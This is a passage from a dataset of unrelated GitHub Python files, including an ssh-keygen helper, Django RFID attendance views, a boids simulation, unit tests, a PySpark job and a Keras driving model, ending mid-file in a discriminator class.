%I:%M%p\\n\")\n\nfilersa = 'remote_rsa'\nuser_ssh_dir = '/home/oracle/.ssh'\ncur_dir = '/tmp'\nresult_good_file = 'TestGood'\nresult_bad_file = 'TestBad'\nlog_file = 'steps.log'\n\nprint('Current date: ' + cur_date)\n\ndef writeToFile(file='',str=''):\n os.chdir(cur_dir)\n fd = open(file,'a')\n fd.write(str)\n fd.close()\n\ndef touch(path=''):\n with open(path,'a'):\n os.utime(path,None)\n ##os.close(path)\n\ndef checkCreateRSA(file,path):\n \"\"\"Check exist file RSA. 
If not exists - Create \"\"\"\n cmd = 'ssh-keygen -t rsa -b 4096 -N \\'\\' -f' + path + '/' + file\n\n os.chdir(path)\n if os.path.isfile(file):\n return True\n else:\n result = os.system(cmd)\n if result == 0:\n return True\n else:\n return False\n\nif not os.path.isfile(log_file):\n touch(log_file)\nelse:\n writeToFile(log_file,cur_date)\n\nif checkCreateRSA(filersa,user_ssh_dir):\n writeToFile(log_file,'')","repo_name":"vaxabitus/mypythonkoans","sub_path":"koans/temp/sshd.py","file_name":"sshd.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35219705023","text":"# Seth Squires\n# 11/21\n# Common Game Functions\n\n\n# askYesOrNo\ndef askYesOrNo(question):\n \"\"\"asks a yes or no question to the user and returns the answer if it is yes or no\"\"\"\n while True:\n answer = input(question)\n\n if (\"y\" in answer.lower() and \"n\" in answer.lower()):\n print(\"\\nThat answer was too complicated for me. Try again. \\n\")\n continue\n elif (\"y\" in answer.lower()):\n answer = \"Yes\"\n return answer\n elif (\"n\" in answer.lower()):\n answer = \"No\"\n return answer\n else:\n print(\"\\nInvalid response. Try again.\\n\")\n\n# flip coin, roll dice\ndef flipCoin():\n import random\n \"\"\"picks a random value and returns heads or tails\"\"\"\n side = random.randint(0, 1)\n if side == 0:\n side = \"Heads\"\n return side\n elif side == 1:\n side = \"Tails\"\n return side\n\ndef rollDice(high):\n import random\n \"\"\"takes in the number of sides and picks a random number\"\"\"\n side = random.randint(1, high)\n return side\n\n# getNumInRange\ndef getNumInRange(low, high, question):\n \"\"\"\"takes in a minimum, maximum and question. Asks the user the question, then gets the answer and returns it.\"\"\"\n while True:\n number = input(question)\n try:\n number = int(number)\n if number >= low:\n if number <= high:\n return number\n\n else:\n print(\"Too high, try again.\\n\")\n else:\n print(\"Too low, try again.\\n\")\n except:\n print(\"Invalid input, try again.\\n\")\n\n# Make a menu and return an input\ndef menu(text, options):\n \"\"\"takes in a list of options and asks the player which they would like to do.\"\"\"\n print(text)\n while True:\n for i in range(len(options)):\n print(str(i+1)+\" \"+options[i])\n answer = input(\"What would you like to do? \")\n try:\n answer = int(answer)\n if answer <= len(options) and answer > 0:\n return answer-1\n else:\n input(\"Invalid input, press enter to try again.\\n\")\n\n\n except:\n input(\"Invalid input, press enter try again.\\n\")\n\ndef getName():\n \"\"\"asks the user for their name and returns it.\"\"\"\n while True:\n name = input(\"What's your name?\")\n if name.isalpha() and len(name)>0:\n name.capitalize()\n return name\n else:\n input(\"Invalid input, press enter to try again.\")\n\ndef shuffleDeck(deck):\n \"\"\"takes a deck and shuffles it.\"\"\"\n import random\n random.shuffle(deck)\n return deck\n\ndef dealCard(deck):\n \"\"\"takes in a deck and gives the top part of that deck\"\"\"\n card = deck.pop(0)\n return card\n\ndef randomCard(deck):\n \"\"\"takes in a deck and gives a random card from that deck\"\"\"\n import random\n card = deck.pop(random.randint(0,len(deck)-1))\n return card\n\nif __name__ == \"__main__\":\n print(\"This is not a program. 
Try importing and using the classes.\")\n    input(\"\\n\\nPress the enter key to exit.\")\n","repo_name":"Sdsquires27/Seth-S-Programming-Portfolio","sub_path":"Chucklehead - Graphical (Python)/commonGameFunctions.py","file_name":"commonGameFunctions.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11498685066","text":"from atexit import register\nfrom datetime import datetime\nfrom urllib import request\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom .serializers import *\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.http import HttpResponse\nfrom .models import *\nfrom .forms import *\n\n\n# Create your views here.\ndef index(request):\n    data = Student.objects.all().order_by('-id')\n    context = {'datas': data}\n    return render(request,'index.html', context)\n\n\ndef student_attendance(request):\n    data = Attendance.objects.all().order_by('-id')\n    context = {'datas': data, 'name':'All attendance'}\n    return render(request, 'attendance.html', context)\n\n\ndef student_reg(request):\n    return render(request,'student_registration.html')\n\ndef student_perf(request):\n    return render(request,'student_performance.html')\n\ndef teacher_reg(request):\n    return render(request,'teacher_registertion.html')\n\ndef teacher_perf(request):\n    return render(request,'teacher_perf.html')\n\n\n@api_view(['POST'])\ndef insert_attendance_post(request):\n    print(request.data)\n    card = str(request.data['card'].replace(' ', ''))\n    alcohol = int(request.data['alcohol'])\n    identifier = request.data['identifier']\n    user = '- No student found'\n    attend_status = \"\" # by default attendance is okay\n\n    if alcohol >= 30:\n        attend_status = \"drunk\" # he is drunk\n    try:\n        get_student = Student.objects.get(card_id=card)\n        get_student_class = get_student.class_name\n        try:\n            get_identifier_class = OurClass.objects.get(identifier=identifier)\n        except:\n            attend_status = \"class not found\" #invalid class identifier\n            return Response(attend_status, status=status.HTTP_304_NOT_MODIFIED)\n\n        if get_identifier_class != get_student_class:\n            attend_status = \"not our student\" # does not belong to this class\n            return Response(attend_status)\n        insert_data = Attendance()\n        insert_data.student = get_student\n        
# link the swipe to the class session resolved from the device identifier\n        insert_data.class_attend = get_identifier_class\n        insert_data.alcohol_level = alcohol\n        insert_data.save()\n        user = get_student.fullname\n    except:\n        attend_status = \"student card not found\" # student not found\n    return HttpResponse(f'{attend_status}{user}', status=status.HTTP_200_OK)\n\n\n# http://127.0.0.1/api/idatechiot/card1002alcohol8/\n@api_view(['GET'])\ndef insert_attendance_get(request, identifier, card, alcohol):\n    attend_status = \"\" # by default attendance is okay\n    user = 'No student found'\n    if alcohol >= 30:\n        attend_status = \"drunk\" # he is drunk\n    try:\n        get_student = Student.objects.get(card_id=card)\n        get_student_class = get_student.class_name\n        try:\n            get_identifier_class = OurClass.objects.get(identifier=identifier)\n        except:\n            attend_status = \"class not found\" #invalid class identifier\n            return Response(attend_status)\n\n        if get_identifier_class != get_student_class:\n            attend_status = \"not our student\" # does not belong to this class\n            return Response(attend_status)\n        insert_data = Attendance()\n        insert_data.student = get_student\n        insert_data.class_attend = get_identifier_class\n        insert_data.alcohol_level = alcohol\n        insert_data.save()\n        user = get_student.fullname\n    except:\n        attend_status = \"student card not found \" # student was not found\n    return HttpResponse(f'{attend_status} {user}', status=status.HTTP_200_OK)\n\n\ndef register_student(request):\n    form = CreateUserForm()\n    if request.method == 'POST':\n        form = CreateUserForm(request.POST)\n        if form.is_valid():\n            form.save()\n            return redirect('../')\n\n    context = {'form': form}\n    return render(request, 'signup.html', context)\n\n# datetime.today().date()\n\ndef today_attendance(request):\n    today = datetime.today()\n    year = today.year\n    month = today.month\n    day = today.day\n    data = Attendance.objects.filter(arrive_time__year=year,\n                                     arrive_time__month=month, arrive_time__day=day).order_by('-id')\n    context = {'datas': data, 'name':'TODAY ATTENDANCE'}\n    return render(request, 'attendance.html', context)\n\n\ndef view_selected_attendance(request, myid):\n    get_student = Student.objects.get(id=myid)\n    data = Attendance.objects.filter(student=get_student).order_by('-id')\n    context = {'datas': data, 'name':'SELECTED STUDENT ATTENDANCE'}\n    return render(request, 'attendance.html', context)\n\n\ndef test(request):\n    pass\n","repo_name":"zaincode21/Class-Monitoring-with-camera-and-RFID","sub_path":"indexapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35219705023","text":"import random\nclass Boid:\n\n\n    def __init__(self,*args):\n        '''\n\n        :param args: tuple of arguments in the form (x position, y position, x velocity, y velocity)\n        '''\n        # boundaries that the boids position and velocity must be between\n        self._x_pos_boundaries = {'low':-450,'high':50.0}\n        self._y_pos_boundaries = {'low':300.0,'high':600.0}\n        self._x_vel_boundaries = {'low':0,'high':10.0}\n        self._y_vel_boundaries = {'low':-20.0,'high':20.0}\n\n        if len(args)==0:\n            #initialising boids position and velocity\n            self._x_pos=random.uniform(self._x_pos_boundaries['low'],self._x_pos_boundaries['high'])\n            self._y_pos=random.uniform(self._y_pos_boundaries['low'],self._y_pos_boundaries['high'])\n            self._x_vel=random.uniform(self._x_vel_boundaries['low'],self._x_vel_boundaries['high'])\n            self._y_vel=random.uniform(self._y_vel_boundaries['low'],self._y_vel_boundaries['high'])\n        else:\n            #user defined position of boid\n            try:\n                
x_position,y_position,x_velocity,y_velocity=args\n            except ValueError:\n                raise ValueError('args expected to be of length 4')\n            x_pos_outside_boundary = x_position < self._x_pos_boundaries['low'] or x_position > self._x_pos_boundaries['high']\n            y_pos_outside_boundary = y_position < self._y_pos_boundaries['low'] or y_position > self._y_pos_boundaries['high']\n            x_vel_outside_boundary = x_velocity < self._x_vel_boundaries['low'] or x_velocity > self._x_vel_boundaries['high']\n            y_vel_outside_boundary = y_velocity < self._y_vel_boundaries['low'] or y_velocity > self._y_vel_boundaries['high']\n            if x_pos_outside_boundary:\n                raise ValueError('x position coordinate outside boundary')\n            elif y_pos_outside_boundary:\n                raise ValueError('y position coordinate outside boundary')\n            elif x_vel_outside_boundary:\n                raise ValueError('x velocity coordinate outside boundary')\n            elif y_vel_outside_boundary:\n                raise ValueError('y velocity coordinate outside boundary')\n            else:\n                self._x_pos=x_position\n                self._y_pos=y_position\n                self._x_vel=x_velocity\n                self._y_vel=y_velocity\n\n\n    def getPosition(self):\n        '''\n        getter for position\n        :return: dictionary of boid position cartesian coordinates\n        '''\n        return{\n            'x':self._x_pos,\n            'y':self._y_pos\n        }\n    def getVelocity(self):\n        '''\n        getter for velocity\n        :return: dictionary of boid velocity in cartesian coordinates\n        '''\n        return {\n            'x':self._x_vel,\n            'y':self._y_vel\n        }\n\n    def setPosition(self,x,y):\n        '''\n        set the position of a boid in 2D cartesian space\n        :param x: x position\n        :param y: y position\n        '''\n\n        x_outside_boundary = x < self._x_pos_boundaries['low'] or x > self._x_pos_boundaries['high']\n        y_outside_boundary = y < self._y_pos_boundaries['low'] or y > self._y_pos_boundaries['high']\n        #if x_outside_boundary:\n        #    raise ValueError('x position coordinate outside boundary')\n        #elif y_outside_boundary:\n        #    raise ValueError('y position coordinate outside boundary')\n        #else:\n        self._x_pos=x\n        self._y_pos=y\n\n    def setVelocity(self,x,y):\n        '''\n        set the velocity of a boid in 2D cartesian space\n        :param x: x velocity\n        :param y: y velocity\n        '''\n        x_outside_boundary = x < self._x_vel_boundaries['low'] or x > self._x_vel_boundaries['high']\n        y_outside_boundary = y < self._y_vel_boundaries['low'] or y > self._y_vel_boundaries['high']\n        #if x_outside_boundary:\n        #    raise ValueError('x velocity coordinate outside boundary')\n        #elif y_outside_boundary:\n        #    raise ValueError('y velocity coordinate outside boundary')\n        #else:\n        self._x_vel=x\n        self._y_vel=y\n\n    def towardsMiddle(self,boid,num_boids):\n        '''\n        Update velocity so that the boid flies towards the middle of the flock\n        :param boid: another boid object\n        :param num_boids: number of boids in the flock\n        '''\n        boid_pos=boid.getPosition()\n        new_x_vel=self._x_vel+(boid_pos['x']-self._x_pos)*0.01/num_boids\n        new_y_vel=self._y_vel+(boid_pos['y']-self._y_pos)*0.01/num_boids\n        self.setVelocity(new_x_vel,new_y_vel)\n\n\n    def awayFromNeighbour(self,boid):\n        '''\n        If another boid is close then fly away from it\n        :param boid: another boid object\n        '''\n        boid_pos=boid.getPosition()\n        is_neighbour=((boid_pos['x']-self._x_pos)**2 + (boid_pos['y']-self._y_pos)**2) < 100\n        if is_neighbour:\n            new_x_vel=self._x_vel+(self._x_pos-boid_pos['x'])\n            new_y_vel=self._y_vel+(self._y_pos-boid_pos['y'])\n            self.setVelocity(new_x_vel,new_y_vel)\n\n    def matchSpeedOfNeighbour(self,boid,num_boids):\n        '''\n        If a boid is close(ish) then try to make velocity similar to the boid's\n        :param boid: another boid object\n        :param num_boids: number of boids in the flock\n        '''\n        boid_pos=boid.getPosition()\n        boid_vel=boid.getVelocity()\n        is_neighbour=((boid_pos['x']-self._x_pos)**2 + (boid_pos['y']-self._y_pos)**2) < 10000\n        if is_neighbour:\n            new_x_vel=self._x_vel+(boid_vel['x']-self._x_vel)*0.125/num_boids\n            new_y_vel=self._y_vel+(boid_vel['y']-self._y_vel)*0.125/num_boids\n            
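# alignment rule: nudge this boid's velocity a fraction towards the neighbour's\n            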
self.setVelocity(new_x_vel,new_y_vel)\n\n    def move(self):\n        '''\n        update position based on the velocity\n        '''\n        new_x_pos=self._x_pos+self._x_vel\n        new_y_pos=self._y_pos+self._y_vel\n        self.setPosition(new_x_pos,new_y_pos)","repo_name":"samstern/Boids","sub_path":"Boids/boid.py","file_name":"boid.py","file_ext":"py","file_size_in_byte":5908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22952549131","text":"import plotly.express as px\n\nfrom random_walk import RandomWalk\n\n\n# Make a random walk.\nrw = RandomWalk(50_000)\nrw.fill_walk()\n\n# Plot the points in the walk.\ndf = px.data.iris()\nnum_of_plots = range(50000)\nfig = px.scatter(df, x=rw.x_values, y=rw.y_values, color=num_of_plots)\nfig.show()\n\n","repo_name":"lucasfsf/data_visualization","sub_path":"rw_visual_plotly.py","file_name":"rw_visual_plotly.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21554962241","text":"import main\nimport unittest\nimport sqlite3\nimport requests\nfrom unittest import mock\nfrom unittest.mock import patch\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napi_key = os.getenv('MY_API_KEY')\n\ndb_path = './app_data/dbase.db'\n\nmy_api_key = api_key\n\nclass userTests(unittest.TestCase):\n\n    test_telegram_id = 999999999999999999\n    test_telegram_id_for_creation = 999999999999999991\n\n    def setUp(self):#here a test user record is created\n        conn = sqlite3.connect(db_path)\n        cursor = conn.cursor()\n        cursor.execute('CREATE TABLE IF NOT EXISTS users (telegram_id INTEGER PRIMARY KEY)')\n        cursor.execute('INSERT INTO users (telegram_id) VALUES (?)', (self.test_telegram_id,))\n        conn.commit()\n        conn.close()\n    \n    def tearDown(self):\n        conn = sqlite3.connect(db_path)\n        cursor = conn.cursor()\n        cursor.execute('DELETE FROM users WHERE telegram_id = ?', (self.test_telegram_id,))\n        cursor.execute('DELETE FROM users WHERE telegram_id = ?', (self.test_telegram_id_for_creation,))\n        conn.commit()\n        conn.close()\n\n    def testCheckUserExistance(self):#here we check the existence of what was created\n        user = main.User(self.test_telegram_id)\n        result = user.checkUserRecord()\n        self.assertEqual(result, self.test_telegram_id)\n\n    def testCreateUser(self):#here we create a new user and check that it is in the database\n        user = main.User(self.test_telegram_id_for_creation)\n        result_creation = user.createUserRecord()\n        result_check = user.checkUserRecord()\n        self.assertEqual(result_check, self.test_telegram_id_for_creation)\n\nclass currencyTests(unittest.TestCase):\n    \n    test_cur_id_1 = \"USD\"\n    test_cur_id_2 = \"EUR\"\n    ret_value = {\n    \"Realtime Currency Exchange Rate\": {\n        \"1. From_Currency Code\": \"USD\",\n        \"2. From_Currency Name\": \"United States Dollar\",\n        \"3. To_Currency Code\": \"EUR\",\n        \"4. To_Currency Name\": \"Euro\",\n        \"5. Exchange Rate\": \"0.93910000\",\n        \"6. Last Refreshed\": \"2023-09-25 05:40:02\",\n        \"7. Time Zone\": \"UTC\",\n        \"8. Bid Price\": \"0.93908000\",\n        \"9. 
Ask Price\": \"0.93913000\"\n    }}\n\n    def testCheckCurrencyExistance(self):\n\n        with mock.patch('requests.get') as mock_get:\n            \n            mock_response_success = mock.Mock()\n            mock_response_success.status_code = 200\n            mock_response_success.json.return_value = self.ret_value\n\n            mock_response_error = mock.Mock()\n            mock_response_error.status_code = 404\n            mock_response_error.json.return_value = None\n\n            mock_get.return_value = mock_response_success\n            result_success = main.curTocur(self.test_cur_id_1, self.test_cur_id_2)\n            self.assertTrue(result_success, mock_get.return_value)\n\n            mock_get.return_value = mock_response_error\n            result_error = main.curTocur(self.test_cur_id_1, self.test_cur_id_2)\n            self.assertFalse(result_error, mock_get.return_value)\n\n\nclass CurrencyTests(unittest.TestCase):\n    \n    test_cur_id = \"USD\"\n    test_date = \"23/09/2023\"\n    ret_value = \"\"\"\n    <ValCurs>\n    <Valute>\n    <NumCode>840</NumCode>\n    <CharCode>USD</CharCode>\n    <Nominal>1</Nominal>\n    <Name>Доллар США</Name>\n    <Value>96,0419</Value>\n    </Valute>\n    </ValCurs>\n\"\"\"\n\n    def testCheckCurrencyExistance(self):\n\n        with mock.patch('requests.get') as mock_get:\n            mock_response_success = mock.Mock()\n            mock_response_success.status_code = 200\n            mock_response_success.text = self.ret_value\n\n            mock_response_error = mock.Mock()\n            mock_response_error.status_code = 404\n            mock_response_error.text = None\n\n            mock_get.return_value = mock_response_success\n            result = main.checkCurrency(self.test_date, self.test_cur_id)\n            self.assertEqual(result, 96.04)\n\n            mock_get.return_value = mock_response_error\n            result_error = main.checkCurrency(self.test_date, self.test_cur_id)\n            self.assertFalse(result_error, mock_get.return_value)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"petranam/lesson_2","sub_path":"test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43723529308","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 2 20:51:59 2018\r\n\r\n@author: Paul\r\n\"\"\"\r\ndict1={\"林小明\":85,\"黃明晶\":71,\"曾山水\":93}\r\ndict1.setdefault(\"陳莉莉\",98)\r\ndict1.setdefault(\"鄭美麗\",67)\r\nnameandscore=list(dict1.items())\r\nfor i in range(0,5):\r\n    print(\"%s 的成績為:%d分\"%(nameandscore[i][0],nameandscore[i][1]))\r\n    i+=1\r\n#林小明 黃明晶 曾山水 陳莉莉 鄭美麗\r\n#85 71 93 98 67","repo_name":"paul33931029/python-beginner","sub_path":"我做的程式/ch03/顯示字典內容(二).py","file_name":"顯示字典內容(二).py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6263525600","text":"\"\"\"empty message\n\nRevision ID: 8c4cf25f4e2b\nRevises: d09178809d5e\nCreate Date: 2018-08-27 11:43:08.721111\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"8c4cf25f4e2b\"\ndown_revision = \"d09178809d5e\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table(\n        \"category\",\n        sa.Column(\"id\", sa.Integer(), nullable=False),\n        sa.Column(\"title\", sa.String(length=64), nullable=True),\n        sa.PrimaryKeyConstraint(\"id\"),\n    )\n    op.create_index(op.f(\"ix_category_title\"), \"category\", [\"title\"], unique=True)\n    op.add_column(\"post\", sa.Column(\"category_id\", sa.Integer(), nullable=True))\n    op.create_foreign_key(None, \"post\", \"category\", [\"category_id\"], [\"id\"])\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, \"post\", type_=\"foreignkey\")\n op.drop_column(\"post\", \"category_id\")\n op.drop_index(op.f(\"ix_category_title\"), table_name=\"category\")\n op.drop_table(\"category\")\n # ### end Alembic commands ###\n","repo_name":"Stormy9/CS407MA_Fall-18","sub_path":"wolfit-Stormy9/migrations/versions/8c4cf25f4e2b_add_categories.py","file_name":"8c4cf25f4e2b_add_categories.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5211670870","text":"\"\"\"\nThis script matches MostPopularSuperheroDataset.scala.\n\"\"\"\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, IntegerType, StringType\nfrom pyspark.sql.functions import split, col, sum, size\n\n\ndef main() -> None:\n spark = SparkSession.builder.appName(\"MostPopularSuperheroDataFrame\").master(\"local[*]\").getOrCreate()\n\n superhero_names_schema = StructType()\n superhero_names_schema.add(\"id\", IntegerType(), True)\n superhero_names_schema.add(\"name\", StringType(), True)\n names = spark.read.format(\"csv\").schema(superhero_names_schema).option(\"sep\", \" \").load(\"./data/marvel-names.txt\")\n\n lines = spark.read.text(\"./data/marvel-graph.txt\")\n connections = lines.withColumn(\"id\", split(col(\"value\"), pattern=\" \")[0]) \\\n .withColumn(\"connections\", size(split(col(\"value\"), pattern=\" \")) - 1) \\\n .groupby(\"id\").agg(sum(\"connections\").alias(\"connections\"))\n\n most_popular = connections.sort(col(\"connections\").desc()).first()\n most_popular_name = names.filter(col(\"id\") == most_popular[0]).select(\"name\").first()\n print(f\"{most_popular_name[0]} is the most popular superhero with {most_popular[1]} co-appearances.\")\n\n spark.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tomer0013/pyspark-examples","sub_path":"MostPopularSuperheroDataFrame.py","file_name":"MostPopularSuperheroDataFrame.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10169948809","text":"from random import choices\n\n\ndef fruit():\n fruits = [\"apple\", \"banana\", \"cherry\", \"durian\"]\n return choices(fruits)[0]\n\n\ndef meal(beverage):\n my_fruit = fruit()\n print(f\"My fruit is {my_fruit}\")\n if my_fruit == \"cherry\":\n complete_meal = f\"Your meal is a {my_fruit} and {beverage}\"\n return complete_meal\n return f\"Your meal is a steak and {beverage}\"\n\n\nif __name__ == \"__main__\":\n print(fruit())\n","repo_name":"richardvlas/python-for-devops-june-2023","sub_path":"devopslib/randomfruit.py","file_name":"randomfruit.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33831842655","text":"import numpy as np\nimport torch\nimport cv2\n\nfrom unimatch.unimatch import UniMatch\nfrom utils.flow_viz import flow_to_image\n\nmodel = UniMatch(feature_channels=128,\n num_scales=1,\n upsample_factor=8,\n ffn_dim_expansion=4,\n num_transformer_layers=6,\n reg_refine=False,\n task='flow')\n\nmodel.eval()\n# checkpoint_path = 'pretrained/gmflow-scale2-regrefine6-mixdata-train320x576-4e7b215d.pth'\ncheckpoint_path = './pretrained/gmflow-scale1-mixdata-train320x576-4c3a6e9a.pth'\ncheckpoint_flow = torch.load(checkpoint_path)\nmodel.load_state_dict(checkpoint_flow['model'], strict=True)\nattn_type = 'swin'\nattn_splits_list = [2]\ncorr_radius_list = 
[-1]\nprop_radius_list = [-1]\nnum_reg_refine = 1\n\ncap = cv2.VideoCapture('demo/test.mkv')\nprev = None\n\nwith torch.no_grad():\n    while cap.isOpened():\n        ret, img = cap.read()\n        if not ret: break\n        height, width = img.shape[:2]\n        imgL = img[:, :int(width/2)]\n        imgL = cv2.resize(imgL, (384, 384))\n        if prev is None:\n            prev = imgL\n            continue\n\n        image1 = np.array(prev).astype(np.float32)\n        image2 = np.array(imgL).astype(np.float32)\n\n        image1 = torch.from_numpy(image1).permute(2, 0, 1).float().unsqueeze(0)\n        image2 = torch.from_numpy(image2).permute(2, 0, 1).float().unsqueeze(0)\n\n        results_dict = model(image1, image2,\n                             attn_type=attn_type,\n                             attn_splits_list=attn_splits_list,\n                             corr_radius_list=corr_radius_list,\n                             prop_radius_list=prop_radius_list,\n                             num_reg_refine=num_reg_refine,\n                             task='flow',\n                             )\n\n        flow_pr = results_dict['flow_preds'][-1]  # [1, 2, H, W] or [1, H, W]\n        flow = flow_pr[0].permute(1, 2, 0).cpu().numpy()  # [H, W, 2]\n\n        u = flow[:, :, 0]\n        v = flow[:, :, 1]\n        rad = np.sqrt(u ** 2 + v ** 2)\n        a = np.arctan2(-v, -u) / np.pi\n        print(rad)\n        print(a)\n\n\n        output = flow_to_image(flow)  # [H, W, 3]\n\n        prev = imgL\n\n        cv2.imshow('flow', output)\n        if cv2.waitKey(1) == ord('q'):\n            break\n\ncv2.destroyAllWindows()\ncap.release()\n","repo_name":"michael-mueller-git/FunPos","sub_path":"FeatureExtraction/unimatch/test_001.py","file_name":"test_001.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"22782508947","text":"import csv\nimport cv2\nimport numpy as np\n\ndef add_relu_activation_function():\n\tmodel.add(Activation('relu'))\n\ndef add_convolutional_layer(filter, kernel_size):\n\tmodel.add(Convolution2D(filter, kernel_size, kernel_size, border_mode='valid'))\n\tadd_relu_activation_function()\n\nlines = []\nwith open('./driving_log.csv') as csvfile:\n\treader = csv.reader(csvfile)\n\tfor row in reader:\n\t\tlines.append(row)\n\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(lines, test_size=0.2)\nimport sklearn\nfrom sklearn.utils import shuffle\n\ndef generator(samples, batch_size = 64):\n\tnum_samples = len(samples)\n\tcorrection_factor = [0.0, +0.2, -0.2]\n\n\twhile 1: # Loop forever so the generator never terminates\n\t\tshuffle(samples)\n\t\tfor offset in range(0, num_samples, batch_size):\n\t\t\tbatch_samples = samples[offset:offset+batch_size]\n\t\t\t\n\t\t\timages = []\n\t\t\tmeasurments = []\n\t\t\t\n\t\t\tfor batch_sample in batch_samples: #get the 3 images for the same frame and their corresponding readings\n\t\t\t\tfor i in range(3):\n\t\t\t\t\tsource_path = batch_sample[i]\n\t\t\t\t\tfilename = source_path.split('/')[-1]\n\t\t\t\t\tcurrent_path = './IMG/' + filename\n\t\t\t\t\timage = cv2.imread(current_path)\n\t\t\t\t\timage_flipped = np.fliplr(image)\n\t\t\t\t\timages.append(image)\n\t\t\t\t\timages.append(image_flipped)\n\t\t\t\t\tsteering = float(batch_sample[3]) + correction_factor[i]\n\t\t\t\t\tmeasurments.append(steering)\n\t\t\t\t\tmeasurment_flipped = -steering\n\t\t\t\t\tmeasurments.append(measurment_flipped)\n\n\t\t\tx_data = np.array(images)\n\t\t\ty_data = np.array(measurments)\n\t\t\tyield sklearn.utils.shuffle(x_data, y_data)\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, 
Activation, Flatten, Dropout, Lambda\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers import Cropping2D\nfrom keras.callbacks import *\n\nmodel = Sequential()\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((70,25), (0,0))))\n\n#first convolution layer\nadd_convolutional_layer(24, 5)\nmodel.add(MaxPooling2D((2, 2)))\n\n#second convolution layer\nadd_convolutional_layer(36, 5)\n\n#third convolution layer\nadd_convolutional_layer(48, 5)\nmodel.add(MaxPooling2D((2, 2)))\n\n#fourth convolution layer\nadd_convolutional_layer(64, 3)\n\n#fifth convolution layer\nadd_convolutional_layer(64, 3)\nmodel.add(MaxPooling2D((2, 2)))\n\nmodel.add(Flatten()) # flatten the model into 1 dimension.\n\n#first fully connected\nmodel.add(Dense(1164))\nadd_relu_activation_function()\n\n#second fully connected\nmodel.add(Dense(100))\nadd_relu_activation_function()\n\n#third fully connected\nmodel.add(Dense(50))\nadd_relu_activation_function()\n\n#fourth fully connected\nmodel.add(Dense(10))\nadd_relu_activation_function()\n\n#last fully connected\nmodel.add(Dense(1))\n\nmodel.compile(loss = 'mse', optimizer = 'adam')\nepochs_to_wait_for_improve = 2\nearly_stopping_callback = EarlyStopping(monitor='val_loss', patience=epochs_to_wait_for_improve)\ncheckpoint_callback = ModelCheckpoint('model.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='min')\nhistory_object = model.fit_generator(train_generator, samples_per_epoch = len(train_samples), \n\tvalidation_data=validation_generator,\n\tnb_val_samples=len(validation_samples), nb_epoch=50, callbacks=[early_stopping_callback, checkpoint_callback])\n\nmodel.save('model.h5')\n\nimport matplotlib.pyplot as plt\n\n### print the keys contained in the history object\nprint(history_object.history.keys())\n\n### plot the training and validation loss for each epoch\nplt.plot(history_object.history['loss'])\nplt.plot(history_object.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n","repo_name":"ahmedmbakr/CarND-Behavioral-Cloning-P3","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4808493668","text":"# -*- coding: UTF-8 -*-\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport sys\nsys.path.append(\"..\")\nfrom common import util\n\n\nclass Discriminator(nn.Module):\n    def __init__(self, obs_shape, act_shape, logger, offline_buffer, interval=15, lr=1e-4):\n        super(Discriminator, self).__init__()\n        self.observation_shape = obs_shape[0] + 1\n        self.action_size = act_shape\n        self.z = 2 * obs_shape[0] + act_shape + 1\n        self.interval = interval\n        self.offline_buffer = offline_buffer\n        self._learning_rate = lr\n   